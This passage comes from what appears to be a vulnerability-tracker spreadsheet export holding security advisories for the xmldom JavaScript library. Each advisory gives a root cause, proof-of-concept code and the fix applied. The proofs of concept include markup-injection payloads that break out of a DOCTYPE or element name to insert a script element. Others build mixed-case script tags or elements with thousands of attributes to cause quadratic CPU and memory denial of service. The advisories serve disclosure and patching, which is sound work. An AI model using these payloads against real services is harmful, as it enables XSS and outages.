mutation / direct property-write bypasses any creation-time check.

### Root Cause

1. The serializer's `requireWellFormed` DocType block checks `publicId`,
   `systemId`, and `internalSubset` (the fields hardened by GHSA-f6ww-3ggp-fr8h)
   but has no check for `name`.
2. `DocumentType.name` is a plain writable own-property; on 0.8.x and the
   unscoped package `createDocumentType()` does not validate it either.
3. The serializer emits `name` directly between the doctype delimiters:
   `&lt;!DOCTYPE ${name}…&gt;`.

## Proof of Concept

Run against `@xmldom/xmldom` v0.9.10 (commit `bb7a085`):

```javascript
const { DOMImplementation, XMLSerializer, DOMParser } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();

// 0.9.x createDocumentType validates the name, so overwrite it via direct property write
const dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
//
// requireWellFormed: true did NOT prevent the injection (no exception thrown).
// The injected &lt;script&gt; is well-formed XHTML that a browser would execute.
```

Confirmed runtime behavior:

- **0.9.x** — `createDocumentType()` rejects the malicious name at creation
  (`InvalidCharacterError`); a direct write to `dt.name` bypasses that, and
  `serializeToString(…, { requireWellFormed: true })` emits the breakout with no
  exception.
- **Re-parse confirmation** — re-parsing the output shows the injected
  `&lt;script&gt;` is a real second top-level element originating entirely from the
  DocType name: the parser rejects it with
  `HierarchyRequestError: Only one element can be added and only after doctype`.
  A comment-injection variant (`dt.name = 'html&gt;&lt;!--INJECTED--'`, output
  `&lt;!DOCTYPE html&gt;&lt;!--INJECTED--&gt;&lt;r/&gt;`) re-parses cleanly and the injected
  comment node is enumerable, confirming the injected node is structurally live.
- **0.8.x** (v0.8.13, `e5c1480`) — `createDocumentType('html&gt;&lt;script&gt;…', '', '')`
  accepts the malicious name directly (no creation-time validation), and
  `serializeToString(doc, null, null, { requireWellFormed: true })` produces
  `&lt;!DOCTYPE html&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;r/&gt;` with no exception.

A browser reproduction does not apply: browsers keep `DocumentType.name`
`readonly`, so the direct-write vector cannot be reproduced in a browser DOM.
The injection is specific to xmldom exposing `name` as writable and serializing
it without a guard.

## Impact

Applications that build a `DocumentType` node with an attacker-influenced
`name` — via direct property write on any affected line, or via
`createDocumentType()` on 0.8.x and the unscoped package — and serialize the
document are vulnerable to XML/markup injection:

- **XML structure injection** — breaking out of the `&lt;!DOCTYPE …&gt;` declaration
  to inject arbitrary sibling elements, comments, or additional markup into the
  output.
- **XSS via XHTML** — if the serialized output is served as XHTML or processed
  by a browser-based XML parser, an injected `&lt;script&gt;` element (in the XHTML
  namespace) executes.
- **requireWellFormed bypass** — applications that adopted
  `requireWellFormed: true` as a mitigation for the prior injection CVEs
  (including the sibling DocType fields fixed by GHSA-f6ww-3ggp-fr8h) remain
  vulnerable through the DocType `name`.

## Fix Applied

Under `requireWellFormed`, the serializer validates the DocType `name` as a well-formed XML
`Name` and throws `InvalidStateError` when it is not — matching the sibling
`publicId`/`systemId`/`internalSubset` checks. Non-breaking and opt-in; ships on both maintained versions. No
creation-time change is made: 0.9.x already validates the name at `createDocumentType`, and the
0.8.x/unscoped creation gap cannot be closed without a breaking change, so it is left
unfixed.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dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

// Default path: the ill-formed name is still emitted verbatim (injection present).
console.log(serializer.serializeToString(doc));
// &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;

// Opt-in path: serialization throws instead of emitting the breakout.
serializer.serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser
`XMLSerializer` emits the name verbatim in that default mode. Unconditionally
throwing would be an unjustified breaking change against that specified default,
so the guard is opt-in behind `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path still emits the ill-formed DocType `name`
verbatim; protection applies only when `requireWellFormed: true` is passed. No
creation-time validation is added for the DocType `name`: 0.9.x already validates
at `createDocumentType`, and the 0.8.x/unscoped creation gap is left unfixed — it
cannot be closed without a breaking change.</t></is></c><c r="T1619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t></is></c></row><row r="1620"><c r="A1620" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1620" s="5" t="inlineStr"><is><t>CVE-2026-83609</t></is></c><c r="D1620" s="5" t="inlineStr" /><c r="E1620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1620" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1620" s="5" t="inlineStr" /><c r="H1620" s="5" t="n"><v>0.003</v></c><c r="I1620" s="5" t="inlineStr" /><c r="J1620" s="5" t="inlineStr" /><c r="K1620" s="5" t="inlineStr" /><c r="L1620" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1620" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1620" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1620" s="5" t="inlineStr" /><c r="R1620" s="5" t="inlineStr" /><c r="S1620" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses xmldom's always-on, WHATWG-mandated creation-time name
validation. `createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` should
reject a malformed qualified name with `InvalidCharacterError`, but a name whose first line is
well-formed slips through and enters the DOM. On serialization it is emitted verbatim, so the
characters after the line terminator inject markup into the output. The injection reaches the default
serialization path, and enabling `requireWellFormed` does not prevent it.

## Details

`createElementNS`, `createAttributeNS`, and `createDocumentType` route through `validateQualifiedName`,
and `createAttribute` performs the analogous check; each validates the name with
`g.QName_exact.test(name)`. `QName_exact = reg('^', QName, '$')` inherits the `m` flag from xmldom's
shared regexp builder, so the matcher accepts any name whose first line is a valid `QName` and leaves
the remaining lines unconstrained (see Root Cause).

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. `validateQualifiedName` / `createAttribute` validate with `.test()` against such a production, so a
   line terminator followed by breakout markup passes and the malformed name is stored.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

const doc = impl.createDocument('urn:x', 'root', null);
const el = doc.createElementNS('urn:x', 'a\n&gt;&lt;script&gt;x&lt;/script');  // ACCEPTED (no throw)
doc.documentElement.appendChild(el);

// DEFAULT serialization — requireWellFormed NOT set:
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;root xmlns="urn:x"&gt;&lt;a
// &gt;&lt;script&gt;x&lt;/script/&gt;&lt;/root&gt;          &lt;-- injected element on the default path
// Control: createElementNS('urn:x', 'bad&gt;name') throws InvalidCharacterError, confirming the check is
// active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the always-on WHATWG creation-time name validation** (`InvalidCharacterError`): a
  malformed name the standard requires be rejected at creation is instead admitted to the DOM.
- **Markup / structure injection.** An application relying on the `create*` APIs to reject malformed
  names (the standard behavior) as a trust boundary is exposed; where the serialized output reaches an
  HTML context, downstream XSS.
- **No serializer option mitigates it.** The admitted name is emitted verbatim under *both* the default
  path and `requireWellFormed: true` — the strict serializer shares the same `m`-flagged blind spot
  (the subject of the sibling serializer advisories) — so the bypassed creation-time check was the only
  layer that could have stopped it. Demonstrated for all four `create*` sites in
  `poc_creation_strict_serialization_bypass.cjs`.

## Fix Applied

`createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` now reject a name
containing a line terminator with `InvalidCharacterError` — the same result they already give for
other malformed names — because name validation now applies to the whole string. The
`requireWellFormed` serializer's name checks are corrected by the same change. The fix is
non-breaking: such a name was already invalid, and no previously-accepted well-formed name is affected.</t></is></c><c r="T1620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t></is></c></row><row r="1621"><c r="A1621" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1621" s="5" t="inlineStr"><is><t>CVE-2026-83611</t></is></c><c r="D1621" s="5" t="inlineStr" /><c r="E1621" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1621" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1621" s="5" t="inlineStr" /><c r="H1621" s="5" t="n"><v>0.004</v></c><c r="I1621" s="5" t="inlineStr" /><c r="J1621" s="5" t="inlineStr" /><c r="K1621" s="5" t="inlineStr" /><c r="L1621" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1621" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1621" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1621" s="5" t="inlineStr" /><c r="R1621" s="5" t="inlineStr" /><c r="S1621" s="5" t="inlineStr"><is><t>## Summary

xmldom's parser silently accepts a **not-well-formed end tag** whose valid name is followed by
trailing content — e.g. `&lt;/a⏎junk&gt;`. The element is closed, the trailing content is discarded, and no
error is reported, even though the XML end-tag production allows only optional whitespace after the
name and both Chromium and Firefox reject such input as `application/xml`. An application that relies
on xmldom to reject not-well-formed input therefore receives a false "valid" result for a document the
specification and browsers consider malformed.

## Details

Across every affected version, an end tag whose valid `Name` is followed by trailing content before
`&gt;` is silently accepted: the element is closed, the residue is dropped, and no error is reported. How
much leaks differs by line (see Affected Versions), but the observable weakness is the same.

On the current (`0.9.x`) line, the parser validates the end-tag name against the XML `ETag` production
with an anchored regular expression (`^ QName S? $`). That expression is compiled with the `m`
(multiline) flag by a shared builder, so `$` matches at an interior line terminator: a valid name on
the first line satisfies the anchored production and any content after the line break escapes the
check. On 0.9.x the whitespace-separated variant (`&lt;/a junk&gt;`) is already rejected; only the
line-terminator variant leaks. Older lines have no anchored end-tag validator at all, so they accept
both the line-terminator and the whitespace variant.

This is **not** content injection — the trailing content is dropped, and the resulting DOM is a normal
single-root document (`&lt;a/&gt;`). The security-relevant property is the silent acceptance of
not-well-formed input: xmldom's parse result disagrees with the specification and with browser XML
parsers, so any control that treats "xmldom parsed it without error" as "well-formed" is bypassed.

### Root Cause

On the `0.9.x` line, where the line-terminator variant specifically leaks:

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. The anchored end-tag production `^ QName S? $` is therefore satisfied by the first line alone, so
   trailing content after a line terminator is neither matched nor rejected — the malformed end tag is
   accepted and the residue silently discarded.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
U+2028 and U+2029 are not XML whitespace, so they are non-conforming trailing content that nonetheless
leaks because the JavaScript `$` anchor treats them as line boundaries under `m`.

## Affected Versions

Both maintained versions are affected and fixed:

- **`0.9.x`** (`&gt;= 0.9.0, &lt;= 0.9.11`) → **`0.9.12`**: the anchored end-tag validator's `m` flag leaks
  the line-terminator variant. The whitespace variant (`&lt;/a junk&gt;`) is already rejected on this line.
- **`0.8.x`** (`&gt;= 0.8.0, &lt;= 0.8.14`) → **`0.8.15`**: no anchored end-tag validator at all — both the
  line-terminator and the whitespace variant are silently accepted; the fix adds a residue check.

`release-0.7.x` (`&lt;= 0.7.13`) and the unscoped `xmldom` package (range `*`, last release 0.6.0) are
**affected but will not be patched** — they are end-of-life / unmaintained. They share the older-line
behavior (both variants silently accepted, residue dropped).

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMParser().parseFromString('&lt;a&gt;&lt;/a\njunk&gt;', 'text/xml'); // no error
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;a/&gt;   — the malformed end tag is accepted, "junk" silently discarded, no error reported.
// Expected (per XML spec / Chromium / Firefox): a parse error — the input is not well-formed.
```

## Impact

- **Silent acceptance of not-well-formed XML**: a document the specification and browser XML parsers
  reject is parsed without error.
- **Bypass of a well-formedness / parse-before-trust gate**: an application relying on xmldom to
  reject malformed input treats such a document as valid. Note this is an input-validation /
  parser-differential issue, not content injection — the trailing content is discarded.

## Fix Applied

The parser now reports a not-well-formed end tag whose valid name is followed by trailing content, on both `0.9.12` and `0.8.15` — previously it was accepted silently — and parsing recovers to the byte-identical DOM as before.\
On `0.9.12` the anchored end-tag validator is corrected so a line break followed by trailing content no longer satisfies it, reported as a recoverable `error` when parsing as XML and a `warning` when parsing as HTML.\
On `0.8.15`, which previously performed no end-tag residue validation, an equivalent residue check is added, reported as a recoverable `error` in both XML and HTML.\
Well-formed documents are unaffected.

Because the report is recoverable, the fix is non-breaking: no previously-parsed document begins to
throw and no serialized output changes. Consumers that want strict rejection can escalate the reported
`error` to a fatal one via the parser's error handler (`onError` in `0.9.12`, `errorHandler` in
`0.8.15`). The two versions also differ in the whitespace-separated variant (`&lt;/a junk&gt;`): `0.9.12`
already rejected it with a fatal error in XML and continues to, while `0.8.15` — which validated
neither variant — now emits the same recoverable report for both the whitespace and line-break
variants.

### Residual limitation

By default the parser still **recovers** (it does not reject the document); the reported condition is a
recoverable `error`/`warning`, not a fatal error, to avoid changing the parsed output in a patch
release. Converting this and the other not-well-formed-acceptance cases to a consistent `fatalError` —
including the broader end-tag leniency on the older versions — is deferred to the next breaking release,
tracked at [xmldom/xmldom#1074](https://github.com/xmldom/xmldom/issues/1074).</t></is></c><c r="T1621" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t></is></c></row><row r="1622"><c r="A1622" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1622" s="5" t="inlineStr"><is><t>CVE-2026-83612</t></is></c><c r="D1622" s="5" t="inlineStr" /><c r="E1622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1622" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1622" s="5" t="inlineStr" /><c r="H1622" s="5" t="n"><v>0.003</v></c><c r="I1622" s="5" t="inlineStr" /><c r="J1622" s="5" t="inlineStr" /><c r="K1622" s="5" t="inlineStr" /><c r="L1622" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1622" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1622" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1622" s="5" t="inlineStr" /><c r="R1622" s="5" t="inlineStr" /><c r="S1622" s="5" t="inlineStr"><is><t>## Summary

In HTML mode (`text/html`), a raw-text element (`script`, `style`, `textarea`, `title`) whose closing
tag differs in case from its opening tag (e.g. `&lt;/ScRiPt&gt;` for `&lt;script&gt;`) is mishandled by the
parser, producing quadratic (O(n²)) output growth — a small crafted document parses and serializes
into output orders of magnitude larger, exhausting CPU and memory. A modest input of tens of KB can
therefore cause a denial of service in any service that parses untrusted HTML with xmldom. Only HTML
mode is affected.

## Details

The parser calls `parseHtmlSpecialContent` for each raw-text element in HTML mode, matched via
`isHTMLRawTextElement` / `isHTMLEscapableRawTextElement` (so all four types — `script`, `style`,
`textarea`, `title` — are in scope). It searches for the element's closing tag with
`source.indexOf('&lt;/' + tagName + '&gt;', elStartEnd)`, a byte-for-byte case-sensitive match. A
mixed-case closing tag never matches, so the search returns `-1`, and the following
`source.substring(elStartEnd + 1, -1)` extracts text backwards from the start of the document
instead of the element's content. The function then returns `-1` to the parse loop, which cannot
advance normally and falls back to character-by-character reprocessing. Every raw-text element
re-captures all source text preceding it, so output grows as O(n²) in the number of such elements.

### Root Cause

1. **Case-sensitive close-tag search** (`lib/sax.js:549`): `source.indexOf('&lt;/' + tagName + '&gt;',
   elStartEnd)` does not fold case, contrary to the WHATWG HTML RAWTEXT end-tag-name rule.
2. **Unguarded `-1`** (`lib/sax.js:550`): `source.substring(elStartEnd + 1, elEndStart)` runs even
   when `elEndStart === -1`, extracting text backwards from position 0.
3. **Unstable progression** (`lib/sax.js:556`): the function returns `elEndStart` (`-1`), driving
   repeated character-by-character fallback in the parse loop.

## Affected Versions

Only the `0.9.x` line is affected — the amplification was introduced in `0.9.0-beta.1` when
`parseHtmlSpecialContent` was refactored, and remains through `0.9.11`. The `0.8.x` line is **not**
affected: its older `parseHtmlSpecialContent` does not amplify, despite sharing the same
case-sensitive `indexOf`.

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const n = 1000;
const payload = '&lt;html&gt;&lt;body&gt;' + '&lt;script&gt;x&lt;/ScRiPt&gt;'.repeat(n) + '&lt;/body&gt;&lt;/html&gt;';
const doc = new DOMParser().parseFromString(payload, 'text/html');
const out = new XMLSerializer().serializeToString(doc);
console.log(payload.length, out.length, (out.length / payload.length).toFixed(1) + 'x');
// 18026 9037063 501.3x  — an 18 KB input yields ~9 MB of output
```

Output size grows quadratically with the number of case-mismatched raw-text elements:

```
Repeats | Input len | Output len | Ratio
1       | 44        | 109        | 2.5x
100     | 1826      | 93763      | 51.3x
500     | 9026      | 2268563    | 251.3x
1000    | 18026     | 9037063    | 501.3x
2000    | 36026     | 36074063   | 1001.3x
```

Proof of Concept from @KarimTantawey (tested with `script`); the same amplification occurs for `style`,
`textarea`, and `title`.

## Impact

Small attacker payloads can force disproportionate CPU and memory usage in services that
parse and serialize untrusted HTML via xmldom. The quadratic growth means a modest-sized input
(tens of kilobytes) can produce output in the tens or hundreds of megabytes, potentially
exhausting memory or causing timeouts.

The attack only requires HTML mode (`text/html` MIME type) and mixed-case closing tags for
any of the four raw-text element types. No special configuration or error handler setup is needed.

## Severity note

The CVSS 4.0 vector scores availability only (`VA:H`, with `VC:N/VI:N`): the flaw neither discloses
nor corrupts data, but a small untrusted HTML input (tens of KB) can force output and memory in the
tens to hundreds of MB, enough to exhaust a service's heap or stall its event loop. It is reachable
with no authentication, configuration, or error-handler setup — only that the application parses
untrusted `text/html` and serializes the result.

## Fix Applied

The raw-text closing tag is now matched case-insensitively in HTML raw-text mode (per the WHATWG HTML
[RAWTEXT end-tag rule](https://html.spec.whatwg.org/multipage/parsing.html#rawtext-end-tag-name-state)),
and a missing closing tag is handled explicitly, removing the quadratic output amplification. Output
for well-formed input is unchanged. Non-breaking; 0.9.x-only.</t></is></c><c r="T1622" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t></is></c></row><row r="1623"><c r="A1623" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1623" s="5" t="inlineStr"><is><t>CVE-2026-83613</t></is></c><c r="D1623" s="5" t="inlineStr" /><c r="E1623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1623" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1623" s="5" t="inlineStr" /><c r="H1623" s="5" t="n"><v>0.003</v></c><c r="I1623" s="5" t="inlineStr" /><c r="J1623" s="5" t="inlineStr" /><c r="K1623" s="5" t="inlineStr" /><c r="L1623" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1623" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1623" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1623" s="5" t="inlineStr" /><c r="R1623" s="5" t="inlineStr" /><c r="S1623" s="5" t="inlineStr"><is><t>## Summary

xmldom builds the attribute collection of every parsed element by inserting attributes one at a
time into a DOM `NamedNodeMap`. Each insertion first performs a **linear scan of all
already-inserted attributes** to enforce the DOM uniqueness rule (no two attributes with the same
qualified name / namespace+local-name). Parsing an element that carries `M` distinct attributes
therefore costs `1 + 2 + … + M = O(M²)` comparisons.

Because the trigger is simply "one element with many attributes", the attack payload is a
**fully well-formed XML document**. No malformed markup, no error recovery, and no non-default
parser options are involved — parsing completes silently with zero `warning`/`error`/`fatalError`
events. An attacker who can submit a modest, highly compressible document (a single element with
tens of thousands of attributes, ~340 KB uncompressed) can consume seconds of single-threaded CPU
per request, enabling an unauthenticated denial of service.

This is distinct from the known quadratic-**memory** namespace-map issue: it burns **CPU** and it
does not require any namespace declarations or nesting.

## Details

The DOM content handler adds each attribute of a starting element by calling
`el.setAttributeNode(attr)` in a loop:

```js
// DOMHandler.startElement
for (var i = 0; i &lt; len; i++) {
	var namespaceURI = attrs.getURI(i);
	var value = attrs.getValue(i);
	var qName = attrs.getQName(i);
	var attr = doc.createAttributeNS(namespaceURI, qName);
	attr.value = attr.nodeValue = value;
	el.setAttributeNode(attr);          // O(existing attrs) each — see below
}
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L370-L387

`setAttributeNode` delegates to `NamedNodeMap.setNamedItem`, which calls `getNamedItemNS` to look
for an existing attribute with the same namespace URI and local name before appending:

```js
setNamedItem: function (attr) {
	var el = attr.ownerElement;
	if (el &amp;&amp; el !== this._ownerElement) {
		throw new DOMException(DOMException.INUSE_ATTRIBUTE_ERR);
	}
	var oldAttr = this.getNamedItemNS(attr.namespaceURI, attr.localName);  // linear scan
	if (oldAttr === attr) {
		return attr;
	}
	_addNamedNode(this._ownerElement, this, attr, oldAttr);
	return oldAttr;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L612-L623

`getNamedItemNS` walks the whole list on every call:

```js
getNamedItemNS: function (namespaceURI, localName) {
	if (!namespaceURI) {
		namespaceURI = null;
	}
	var i = 0;
	while (i &lt; this.length) {
		var node = this[i];
		if (node.localName === localName &amp;&amp; node.namespaceURI === namespaceURI) {
			return node;
		}
		i++;
	}
	return null;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L702-L715

For the i-th attribute the scan visits `i-1` entries, so inserting `M` distinct attributes performs
`Θ(M²)` comparisons. There is no hash index or set keyed by name; the map is a plain
array-backed structure.

The same structure exists on 0.8.x. There `setNamedItem` dedups via
`getNamedItem(attr.nodeName)` instead of `getNamedItemNS`, but that method is likewise a full linear
scan, so the complexity is identical:

- `startElement` loop / `setAttributeNode`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L159-L176
- `setNamedItem` → linear `getNamedItem`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L286-L308

The linear-scan `NamedNodeMap` predates the `@xmldom/xmldom` fork and is present unchanged in the
unscoped `xmldom` package back to its earliest published release. In `xmldom@0.1.0`, parsing already
inserts each attribute one at a time (`DOMHandler.startElement` loops calling
`setAttributeNS` → `setAttributeNode` → `NamedNodeMap.setNamedItem`), and `setNamedItem` dedups by
calling `getNamedItemNS`, which is a full linear `while (i--)` scan of the already-inserted
attributes — the identical `O(M²)` structure. The whole unscoped line (`0.1.0` … `0.6.0`) is
therefore affected; the earliest published tag (`0.1.0`) was verified to contain the per-insert
linear dedup scan.

## Proof of Concept

A single well-formed element with `M` distinct attributes. No malformed markup and no options:

```js
'use strict';
var DOMParser = require('@xmldom/xmldom').DOMParser;

function buildDoc(m) {
	var parts = new Array(m);
	for (var i = 0; i &lt; m; i++) parts[i] = 'a' + i + '="x"';
	return '&lt;r ' + parts.join(' ') + '/&gt;';   // &lt;r a0="x" a1="x" ... a{M-1}="x"/&gt;
}

for (var _i = 0, sizes = [2000, 4000, 8000, 16000, 32000]; _i &lt; sizes.length; _i++) {
	var m = sizes[_i];
	var xml = buildDoc(m);
	var t0 = process.hrtime.bigint();
	var doc = new DOMParser().parseFromString(xml, 'text/xml');  // silent: no error events
	var ms = Number(process.hrtime.bigint() - t0) / 1e6;
	console.log(m + ' attrs, ' + xml.length + ' bytes -&gt; ' + ms.toFixed(1) + ' ms; parsed=' +
		doc.documentElement.attributes.length);
}
```

Measured with Node.js v18.20.8 (wall-clock; absolute numbers vary by host, the **scaling** is the
load-bearing fact):

**`@xmldom/xmldom` 0.9.10:**

| M (attributes) | input bytes | time (ms) | ratio vs prev |
|---:|---:|---:|---:|
| 2000  | 18,894  | 13.4   | —     |
| 4000  | 38,894  | 38.7   | ×2.9  |
| 8000  | 78,894  | 100.8  | ×2.6  |
| 16000 | 164,894 | 406.2  | ×4.0  |
| 32000 | 340,894 | 2149.5 | ×5.3  |

**`@xmldom/xmldom` 0.8.13:**

| M (attributes) | input bytes | time (ms) |
|---:|---:|---:|
| 2000  | 18,894  | 10.6   |
| 4000  | 38,894  | 19.9   |
| 8000  | 78,894  | 75.9   |
| 16000 | 164,894 | 657.7  |
| 32000 | 340,894 | 1643.2 |

**`xmldom` (unscoped) 0.6.0:** 4000 → 28.2 ms, 8000 → 131.8 ms, 16000 → 545.2 ms (≈ ×4 per doubling).

Time grows ≈ ×4 per doubling of `M` — quadratic. About **340 KB of well-formed input costs ~1.6–2.1 s
of single-threaded CPU**, and it keeps scaling: doubling the attribute count quadruples the cost.
The document is trivially generated and compresses to a few kilobytes on the wire.

## Impact

Unauthenticated, remotely triggerable denial of service against any service that parses
attacker-influenced XML/HTML with xmldom. A single request holds one event-loop thread for seconds;
a handful of concurrent requests can saturate CPU and stall the process. Because the payload is a
plain well-formed document (one element, many attributes), it passes any "must be well-formed" gate
and reaches the parser before any application-level validation (e.g. schema checks or signature
verification) can run. The payload is highly compressible, so it is effective over compressed
transports.

## Fix Applied

Replaced the per-insert linear duplicate scan on the parse-time dedup path with a name-keyed
index, so de-duplicating an element's attributes during parse is O(M) instead of O(M²) — a
well-formed-but-hostile attribute list can no longer wedge the parse. Behavior-preserving: attribute
order and duplicate resolution (last value wins, first position kept) are byte-identical. Non-breaking
and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T1623" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t></is></c></row><row r="1624"><c r="A1624" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1624" s="5" t="inlineStr"><is><t>CVE-2026-83614</t></is></c><c r="D1624" s="5" t="inlineStr" /><c r="E1624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1624" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1624" s="5" t="inlineStr" /><c r="H1624" s="5" t="n"><v>0.004</v></c><c r="I1624" s="5" t="inlineStr" /><c r="J1624" s="5" t="inlineStr" /><c r="K1624" s="5" t="inlineStr" /><c r="L1624" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1624" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1624" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1624" s="5" t="inlineStr" /><c r="R1624" s="5" t="inlineStr" /><c r="S1624" s="5" t="inlineStr"><is><t>## Summary

`xmldom`'s malformed-input **error-recovery path** has two quadratic-time (O(n²)) behaviors that a
single crafted input triggers together, so a tiny, highly compressible document (tens of KB) stalls
the Node.js event loop for multiple seconds. It is reachable from `DOMParser.parseFromString` under
**default options** — i.e. from unauthenticated, network-delivered XML — making this an unauthenticated
denial of service. One of the two behaviors, the `normalize()` adjacent-text merge, is **additionally
reachable programmatically** — via a plain `normalize()` call on a DOM built with adjacent text nodes,
independent of the parser — so its fix must live in `normalize()`, not only in a parser bound.

## Details

### Finding A — `parseElementStartPart` quadratic re-scan

A `&lt;` character is not a delimiter in any tag-parsing state, so `parseElementStartPart` scans
forward character-by-character over any embedded `&lt;` until it reaches the next `&gt;` (or end of
input), then validates the accumulated slice as a tag name and throws `invalid tagName:` on failure.
The main loop catches this, reports an `error`, sets `end = -1`, and recovers by advancing a single
character (`appendText(Math.max(tagStart, start) + 1)`). With a long run of `&lt;` and a distant `&gt;`,
each of the O(n) recovery retries performs an O(n) scan plus an O(n) anchored regex validation over
the growing candidate ⇒ **O(n²)**.

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `parseElementStartPart` character scan — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L263-L461
- tag-name validation (`setTagName` → throws `invalid tagName`) — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L886-L891
